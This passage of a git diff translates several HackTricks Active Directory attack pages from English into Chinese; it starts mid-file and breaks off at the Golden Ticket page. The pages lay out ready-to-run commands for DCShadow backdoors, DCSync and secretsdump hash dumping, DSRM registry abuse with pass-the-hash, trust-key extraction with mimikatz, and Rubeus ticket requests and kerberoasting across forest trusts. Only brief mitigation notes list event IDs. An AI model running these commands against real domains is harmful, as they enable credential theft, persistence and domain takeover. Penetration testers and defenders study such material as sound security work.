-Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
+事件 ID 4657 - 审计创建/更改 `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/dcshadow.md b/src/windows-hardening/active-directory-methodology/dcshadow.md
index 904153ec7..ea9df5638 100644
--- a/src/windows-hardening/active-directory-methodology/dcshadow.md
+++ b/src/windows-hardening/active-directory-methodology/dcshadow.md
@@ -2,11 +2,10 @@
 
 # DCShadow
 
-It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
-Note that if you use wrong data, pretty ugly logs will appear.
-
-To perform the attack you need 2 mimikatz instances. One of them will start the RPC servers with SYSTEM privileges (you have to indicate here the changes you want to perform), and the other instance will be used to push the values:
+它在 AD 中注册一个 **新的域控制器**，并使用它在指定对象上 **推送属性**（SIDHistory, SPNs...） **而不**留下任何关于 **修改** 的 **日志**。你 **需要 DA** 权限并且在 **根域** 内。\
+请注意，如果使用错误的数据，会出现相当难看的日志。
 
+要执行攻击，你需要 2 个 mimikatz 实例。其中一个将以 SYSTEM 权限启动 RPC 服务器（你必须在这里指明你想要执行的更改），另一个实例将用于推送值：
 ```bash:mimikatz1 (RPC servers)
 !+
 !processtoken
@@ -16,28 +15,26 @@ lsadump::dcshadow /object:username /attribute:Description /value="My new descrip
 ```bash:mimikatz2 (push) - Needs DA or similar
 lsadump::dcshadow /push
 ```
+注意 **`elevate::token`** 在 `mimikatz1` 会话中不起作用，因为它提升了线程的权限，但我们需要提升 **进程的权限**。\
+您还可以选择并“LDAP”对象：`/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
 
-Notice that **`elevate::token`** won't work in `mimikatz1` session as that elevated the privileges of the thread, but we need to elevate the **privilege of the process**.\
-You can also select and "LDAP" object: `/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local`
+您可以从 DA 或具有以下最小权限的用户推送更改：
 
-You can push the changes from a DA or from a user with this minimal permissions:
+- 在 **域对象** 中：
+- _DS-Install-Replica_（在域中添加/删除副本）
+- _DS-Replication-Manage-Topology_（管理复制拓扑）
+- _DS-Replication-Synchronize_（复制同步）
+- 在 **配置容器** 中的 **站点对象**（及其子对象）：
+- _CreateChild 和 DeleteChild_
+- 作为 DC 注册的 **计算机对象**：
+- _WriteProperty_（不是 Write）
+- **目标对象**：
+- _WriteProperty_（不是 Write）
 
-- In the **domain object**:
-  - _DS-Install-Replica_ (Add/Remove Replica in Domain)
-  - _DS-Replication-Manage-Topology_ (Manage Replication Topology)
-  - _DS-Replication-Synchronize_ (Replication Synchornization)
-- The **Sites object** (and its children) in the **Configuration container**:
-  - _CreateChild and DeleteChild_
-- The object of the **computer which is registered as a DC**:
-  - _WriteProperty_ (Not Write)
-- The **target object**:
-  - _WriteProperty_ (Not Write)
-
-You can use [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
-For example: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` This means that the username _**student1**_ when logged on in the machine _**mcorp-student1**_ has DCShadow permissions over the object _**root1user**_.
-
-## Using DCShadow to create backdoors
+您可以使用 [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) 将这些权限授予无权限用户（注意这会留下某些日志）。这比拥有 DA 权限要严格得多。\
+例如：`Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` 这意味着用户名 _**student1**_ 在机器 _**mcorp-student1**_ 上登录时对对象 _**root1user**_ 拥有 DCShadow 权限。
 
+## 使用 DCShadow 创建后门
 ```bash:Set Enterprise Admins in SIDHistory to a user
 lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
 ```
@@ -52,24 +49,22 @@ lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
 #Second, add to the ACE permissions to your user and push it using DCShadow
 lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>
 ```
+## Shadowception - 使用 DCShadow 授予 DCShadow 权限（无修改权限日志）
 
-## Shadowception - Give DCShadow permissions using DCShadow (no modified permissions logs)
+我们需要在用户的 SID 末尾附加以下 ACE：
 
-We need to append following ACEs with our user's SID at the end:
+- 在域对象上：
+- `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
+- `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)`
+- `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
+- 在攻击者计算机对象上：`(A;;WP;;;UserSID)`
+- 在目标用户对象上：`(A;;WP;;;UserSID)`
+- 在配置容器中的站点对象上：`(A;CI;CCDC;;;UserSID)`
 
-- On the domain object:
-  - `(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
-  - `(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)`
-  - `(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)`
-- On the attacker computer object: `(A;;WP;;;UserSID)`
-- On the target user object: `(A;;WP;;;UserSID)`
-- On the Sites object in Configuration container: `(A;CI;CCDC;;;UserSID)`
+要获取对象的当前 ACE：`(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=local")).psbase.ObjectSecurity.sddl`
 
-To get the current ACE of an object: `(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl`
+请注意，在这种情况下，您需要进行 **多个更改，** 而不仅仅是一个。因此，在 **mimikatz1 会话**（RPC 服务器）中，使用参数 **`/stack` 进行每个更改。** 这样，您只需 **`/push`** 一次即可在流氓服务器上执行所有堆积的更改。
 
-Notice that in this case you need to make **several changes,** not just one. So, in the **mimikatz1 session** (RPC server) use the parameter **`/stack` with each change** you want to make. This way, you will only need to **`/push`** one time to perform all the stucked changes in the rouge server.
-
-[**More information about DCShadow in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
+[**有关 DCShadow 的更多信息，请访问 ired.team。**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1207-creating-rogue-domain-controllers-with-dcshadow)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md
index 5c16fec40..eb8ab3266 100644
--- a/src/windows-hardening/active-directory-methodology/dcsync.md
+++ b/src/windows-hardening/active-directory-methodology/dcsync.md
@@ -3,8 +3,8 @@
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
 
@@ -12,69 +12,59 @@ Get Access Today:
 
 ## DCSync
 
-The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.
+**DCSync** 权限意味着对域本身拥有以下权限：**DS-Replication-Get-Changes**、**Replicating Directory Changes All** 和 **Replicating Directory Changes In Filtered Set**。
 
-**Important Notes about DCSync:**
+**关于 DCSync 的重要说明：**
 
-- The **DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information** using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
-- By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges.
-- If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
+- **DCSync 攻击模拟域控制器的行为，并请求其他域控制器使用目录复制服务远程协议 (MS-DRSR) 复制信息**。由于 MS-DRSR 是 Active Directory 的有效且必要的功能，因此无法关闭或禁用。
+- 默认情况下，只有 **域管理员、企业管理员、管理员和域控制器** 组具有所需的权限。
+- 如果任何帐户密码以可逆加密存储，Mimikatz 中提供了一个选项可以以明文返回密码。
 
 ### Enumeration
 
-Check who has these permissions using `powerview`:
-
+使用 `powerview` 检查谁拥有这些权限：
 ```powershell
 Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
 ```
-
-### Exploit Locally
-
+### 本地利用
 ```powershell
 Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
 ```
-
-### Exploit Remotely
-
+### 远程利用
 ```powershell
 secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
 [-just-dc-user <USERNAME>] #To get only of that user
 [-pwd-last-set] #To see when each account's password was last changed
 [-history] #To dump password history, may be helpful for offline password cracking
 ```
+`-just-dc` 生成 3 个文件：
 
-`-just-dc` generates 3 files:
+- 一个包含 **NTLM 哈希**
+- 一个包含 **Kerberos 密钥**
+- 一个包含 NTDS 中任何设置了 [**可逆加密**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) 的帐户的明文密码。您可以通过以下命令获取具有可逆加密的用户：
 
-- one with the **NTLM hashes**
-- one with the the **Kerberos keys**
-- one with cleartext passwords from the NTDS for any accounts set with [**reversible encryption**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) enabled. You can get users with reversible encryption with
+```powershell
+Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
+```
 
-  ```powershell
-  Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
-  ```
-
-### Persistence
-
-If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:
+### 持久性
 
+如果您是域管理员，您可以借助 `powerview` 将此权限授予任何用户：
 ```powershell
 Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
 ```
-
-Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of (you should be able to see the names of the privileges inside the "ObjectType" field):
-
+然后，您可以**检查用户是否正确分配**了这3个权限，通过在输出中查找它们（您应该能够在“ObjectType”字段中看到权限的名称）：
 ```powershell
 Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
 ```
+### 缓解措施
 
-### Mitigation
+- 安全事件 ID 4662（对象的审计策略必须启用）– 对一个对象执行了操作
+- 安全事件 ID 5136（对象的审计策略必须启用）– 目录服务对象已被修改
+- 安全事件 ID 4670（对象的审计策略必须启用）– 对象的权限已更改
+- AD ACL 扫描器 - 创建和比较 ACL 的创建报告。 [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
 
-- Security Event ID 4662 (Audit Policy for object must be enabled) – An operation was performed on an object
-- Security Event ID 5136 (Audit Policy for object must be enabled) – A directory service object was modified
-- Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed
-- AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
-
-## References
+## 参考文献
 
 - [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
 - [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
@@ -84,8 +74,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
-
diff --git a/src/windows-hardening/active-directory-methodology/diamond-ticket.md b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
index f866ff502..fff0ac414 100644
--- a/src/windows-hardening/active-directory-methodology/diamond-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/diamond-ticket.md
@@ -4,18 +4,17 @@
 
 ## Diamond Ticket
 
-**Like a golden ticket**, a diamond ticket is a TGT which can be used to **access any service as any user**. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash.
+**像金票一样**，钻石票是一个可以用来**以任何用户身份访问任何服务**的TGT。金票是完全离线伪造的，使用该域的krbtgt哈希加密，然后传递到登录会话中使用。由于域控制器不跟踪它（或他们）合法发出的TGT，因此它们会乐意接受使用其自身krbtgt哈希加密的TGT。
 
-There are two common techniques to detect the use of golden tickets:
+检测金票使用的两种常见技术是：
 
-- Look for TGS-REQs that have no corresponding AS-REQ.
-- Look for TGTs that have silly values, such as Mimikatz's default 10-year lifetime.
+- 查找没有相应AS-REQ的TGS-REQ。
+- 查找具有荒谬值的TGT，例如Mimikatz的默认10年有效期。
 
-A **diamond ticket** is made by **modifying the fields of a legitimate TGT that was issued by a DC**. This is achieved by **requesting** a **TGT**, **decrypting** it with the domain's krbtgt hash, **modifying** the desired fields of the ticket, then **re-encrypting it**. This **overcomes the two aforementioned shortcomings** of a golden ticket because:
-
-- TGS-REQs will have a preceding AS-REQ.
-- The TGT was issued by a DC which means it will have all the correct details from the domain's Kerberos policy. Even though these can be accurately forged in a golden ticket, it's more complex and open to mistakes.
+**钻石票**是通过**修改由DC发出的合法TGT的字段**来制作的。这是通过**请求**一个**TGT**，**使用**域的krbtgt哈希**解密**它，**修改**票证的所需字段，然后**重新加密**它来实现的。这**克服了金票的两个上述缺点**，因为：
 
+- TGS-REQ将有一个前置的AS-REQ。
+- TGT是由DC发出的，这意味着它将具有来自域Kerberos策略的所有正确细节。尽管这些可以在金票中准确伪造，但更复杂且容易出错。
 ```bash
 # Get user RID
 powershell Get-DomainUser -Identity <username> -Properties objectsid
@@ -28,6 +27,4 @@ powershell Get-DomainUser -Identity <username> -Properties objectsid
 # /groups are the desired group RIDs (512 being Domain Admins).
 # /krbkey is the krbtgt AES256 hash.
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
index 471c6d1c3..62a180daf 100644
--- a/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
+++ b/src/windows-hardening/active-directory-methodology/dsrm-credentials.md
@@ -1,35 +1,28 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# DSRM Credentials
-
-There is a **local administrator** account inside each **DC**. Having admin privileges in this machine you can use mimikatz to **dump the local Administrator hash**. Then, modifying a registry to **activate this password** so you can remotely access to this local Administrator user.\
-First we need to **dump** the **hash** of the **local Administrator** user inside the DC:
+# DSRM 凭据
 
+每个 **DC** 内部都有一个 **本地管理员** 账户。拥有该机器的管理员权限后，您可以使用 mimikatz 来 **转储本地管理员哈希**。然后，修改注册表以 **激活此密码**，以便您可以远程访问此本地管理员用户。\
+首先，我们需要 **转储** **DC** 内部 **本地管理员** 用户的 **哈希**：
 ```bash
 Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
 ```
-
-Then we need to check if that account will work, and if the registry key has the value "0" or it doesn't exist you need to **set it to "2"**:
-
+然后我们需要检查该账户是否有效，如果注册表项的值为 "0" 或者不存在，则需要 **将其设置为 "2"**：
 ```bash
 Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
 New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
 Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"
 ```
-
-Then, using a PTH you can **list the content of C$ or even obtain a shell**. Notice that for creating a new powershell session with that hash in memory (for the PTH) **the "domain" used is just the name of the DC machine:**
-
+然后，使用 PTH，您可以 **列出 C$ 的内容或甚至获得一个 shell**。请注意，要使用内存中的哈希（用于 PTH）创建新的 powershell 会话时，**使用的“域”只是 DC 机器的名称：**
 ```bash
 sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
 #And in new spawned powershell you now can access via NTLM the content of C$
 ls \\dc-host-name\C$
 ```
+更多信息请参见：[https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) 和 [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
 
-More info about this in: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) and [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
+## 缓解措施
 
-## Mitigation
-
-- Event ID 4657 - Audit creation/change of `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
+- 事件 ID 4657 - 审计创建/更改 `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
index 6921ec4cc..2a6581b21 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md
@@ -1,13 +1,12 @@
-# External Forest Domain - One-Way (Outbound)
+# 外部森林域 - 单向（出站）
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In this scenario **your domain** is **trusting** some **privileges** to principal from a **different domains**.
+在此场景中，**您的域**正在**信任**来自**不同域**的某些**权限**。
 
-## Enumeration
-
-### Outbound Trust
+## 枚举
 
+### 出站信任
 ```powershell
 # Notice Outbound trust
 Get-DomainTrust
@@ -29,56 +28,46 @@ MemberName              : S-1-5-21-1028541967-2937615241-1935644758-1115
 MemberDistinguishedName : CN=S-1-5-21-1028541967-2937615241-1935644758-1115,CN=ForeignSecurityPrincipals,DC=DOMAIN,DC=LOCAL
 ## Note how the members aren't from the current domain (ConvertFrom-SID won't work)
 ```
+## 信任账户攻击
 
-## Trust Account Attack
-
-A security vulnerability exists when a trust relationship is established between two domains, identified here as domain **A** and domain **B**, where domain **B** extends its trust to domain **A**. In this setup, a special account is created in domain **A** for domain **B**, which plays a crucial role in the authentication process between the two domains. This account, associated with domain **B**, is utilized for encrypting tickets for accessing services across the domains.
-
-The critical aspect to understand here is that the password and hash of this special account can be extracted from a Domain Controller in domain **A** using a command line tool. The command to perform this action is:
+当在两个域之间建立信任关系时，存在安全漏洞，这里将其标识为域 **A** 和域 **B**，其中域 **B** 将其信任扩展到域 **A**。在这种设置中，在域 **A** 中为域 **B** 创建了一个特殊账户，该账户在两个域之间的身份验证过程中发挥着关键作用。与域 **B** 关联的此账户用于加密访问跨域服务的票证。
 
+这里需要理解的关键点是，可以使用命令行工具从域 **A** 的域控制器中提取此特殊账户的密码和哈希。执行此操作的命令是：
 ```powershell
 Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
 ```
+此提取之所以可能，是因为该账户在其名称后带有 **$**，处于活动状态，并且属于域 **A** 的“域用户”组，从而继承了与该组相关的权限。这使得个人能够使用该账户的凭据对域 **A** 进行身份验证。
 
-This extraction is possible because the account, identified with a **$** after its name, is active and belongs to the "Domain Users" group of domain **A**, thereby inheriting permissions associated with this group. This allows individuals to authenticate against domain **A** using the credentials of this account.
-
-**Warning:** It is feasible to leverage this situation to gain a foothold in domain **A** as a user, albeit with limited permissions. However, this access is sufficient to perform enumeration on domain **A**.
-
-In a scenario where `ext.local` is the trusting domain and `root.local` is the trusted domain, a user account named `EXT$` would be created within `root.local`. Through specific tools, it is possible to dump the Kerberos trust keys, revealing the credentials of `EXT$` in `root.local`. The command to achieve this is:
+**警告：** 利用这种情况可以作为用户在域 **A** 中获得立足点，尽管权限有限。然而，这种访问足以对域 **A** 进行枚举。
 
+在 `ext.local` 是信任域而 `root.local` 是被信任域的场景中，将在 `root.local` 中创建一个名为 `EXT$` 的用户账户。通过特定工具，可以转储 Kerberos 信任密钥，从而揭示 `root.local` 中 `EXT$` 的凭据。实现此目的的命令是：
 ```bash
 lsadump::trust /patch
 ```
-
-Following this, one could use the extracted RC4 key to authenticate as `root.local\EXT$` within `root.local` using another tool command:
-
+接下来，可以使用提取的 RC4 密钥通过另一个工具命令以 `root.local\EXT$` 身份在 `root.local` 中进行身份验证：
 ```bash
 .\Rubeus.exe asktgt /user:EXT$ /domain:root.local /rc4:<RC4> /dc:dc.root.local /ptt
 ```
-
-This authentication step opens up the possibility to enumerate and even exploit services within `root.local`, such as performing a Kerberoast attack to extract service account credentials using:
-
+此身份验证步骤打开了枚举甚至利用 `root.local` 中服务的可能性，例如执行 Kerberoast 攻击以提取服务帐户凭据，使用：
 ```bash
 .\Rubeus.exe kerberoast /user:svc_sql /domain:root.local /dc:dc.root.local
 ```
+### 收集明文信任密码
 
-### Gathering cleartext trust password
+在之前的流程中使用了信任哈希，而不是 **明文密码**（该密码也被 **mimikatz** 导出）。
 
-In the previous flow it was used the trust hash instead of the **clear text password** (that was also **dumped by mimikatz**).
-
-The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
+明文密码可以通过将 mimikatz 的 \[ CLEAR ] 输出从十六进制转换并去除空字节 ‘\x00’ 来获得：
 
 ![](<../../images/image (938).png>)
 
-Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
+有时在创建信任关系时，用户必须输入信任的密码。在这个演示中，密钥是原始信任密码，因此是人类可读的。随着密钥的循环（30 天），明文将不再是人类可读的，但在技术上仍然可用。
 
-The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
+明文密码可以用来作为信任账户执行常规身份验证，作为使用信任账户的 Kerberos 秘密密钥请求 TGT 的替代方案。在这里，从 ext.local 查询 root.local 的 Domain Admins 成员：
 
 ![](<../../images/image (792).png>)
 
-## References
+## 参考
 
 - [https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
index 7a8d88e24..b2cbd478d 100644
--- a/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
+++ b/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md
@@ -1,13 +1,12 @@
-# External Forest Domain - OneWay (Inbound) or bidirectional
+# 外部森林域 - 单向（入站）或双向
 
 {{#include ../../banners/hacktricks-training.md}}
 
-In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it.
+在这种情况下，外部域信任您（或双方互相信任），因此您可以获得某种访问权限。
 
-## Enumeration
-
-First of all, you need to **enumerate** the **trust**:
+## 枚举
 
+首先，您需要**枚举****信任**：
 ```powershell
 Get-DomainTrust
 SourceName      : a.domain.local   --> Current domain
@@ -32,7 +31,7 @@ GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
 MemberDomain            : domain.external
 MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
 MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
-                          DC=external
+DC=external
 
 # Get name of the principal in the current domain member of the cross-domain group
 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
@@ -57,48 +56,42 @@ IsDomain     : True
 # You may also enumerate where foreign groups and/or users have been assigned
 # local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
 ```
+在之前的枚举中发现用户 **`crossuser`** 在 **`External Admins`** 组内，该组在 **外部域的 DC** 中拥有 **管理员访问权限**。
 
-In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
+## 初始访问
 
-## Initial Access
-
-If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example):
-
-You can use **Powerview functions** to **enumerate** the **other domain** using the `-Domain` param like in:
+如果你 **无法** 在其他域中找到任何 **特殊** 访问权限，你仍然可以回到 AD 方法论，尝试从 **无特权用户** 提升权限（例如 kerberoasting）：
 
+你可以使用 **Powerview 函数** 通过 `-Domain` 参数来 **枚举** **其他域**，如：
 ```powershell
 Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
 ```
-
 {{#ref}}
 ./
 {{#endref}}
 
-## Impersonation
+## 冒充
 
-### Logging in
-
-Using a regular method with the credentials of the users who is has access to the external domain you should be able to access:
+### 登录
 
+使用具有访问外部域的用户凭据的常规方法，您应该能够访问：
 ```powershell
 Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
 ```
+### SID 历史滥用
 
-### SID History Abuse
+您还可以在森林信任中滥用 [**SID 历史**](sid-history-injection.md)。
 
-You could also abuse [**SID History**](sid-history-injection.md) across a forest trust.
-
-If a user is migrated **from one forest to another** and **SID Filtering is not enabled**, it becomes possible to **add a SID from the other forest**, and this **SID** will be **added** to the **user's token** when authenticating **across the trust**.
+如果用户是 **从一个森林迁移到另一个森林**，并且 **未启用 SID 过滤**，则可以 **添加来自另一个森林的 SID**，并且在 **跨信任** 进行身份验证时，该 **SID** 将被 **添加** 到 **用户的令牌** 中。
 
 > [!WARNING]
-> As a reminder, you can get the signing key with
+> 提醒您，您可以通过以下方式获取签名密钥
 >
 > ```powershell
 > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
 > ```
 
-You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain.
-
+您可以 **使用** 该 **受信任** 密钥 **签名** 一个 **TGT，冒充** 当前域的用户。
 ```bash
 # Get a TGT for the cross-domain privileged user to the other domain
 Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
@@ -109,9 +102,7 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
 
 # Now you have a TGS to access the CIFS service of the domain controller
 ```
-
-### Full way impersonating the user
-
+### 完整的用户冒充方式
 ```bash
 # Get a TGT of the user with cross-domain permissions
 Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
@@ -125,6 +116,4 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
 
 # Now you have a TGS to access the CIFS service of the domain controller
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/golden-ticket.md b/src/windows-hardening/active-directory-methodology/golden-ticket.md
index 314ee03cc..e2bd15e4e 100644
--- a/src/windows-hardening/active-directory-methodology/golden-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/golden-ticket.md
@@ -4,12 +4,11 @@
 
 ## Golden ticket
 
-A **Golden Ticket** attack consist on the **creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user** through the use of the **NTLM hash of the Active Directory (AD) krbtgt account**. This technique is particularly advantageous because it **enables access to any service or machine** within the domain as the impersonated user. It's crucial to remember that the **krbtgt account's credentials are never automatically updated**.
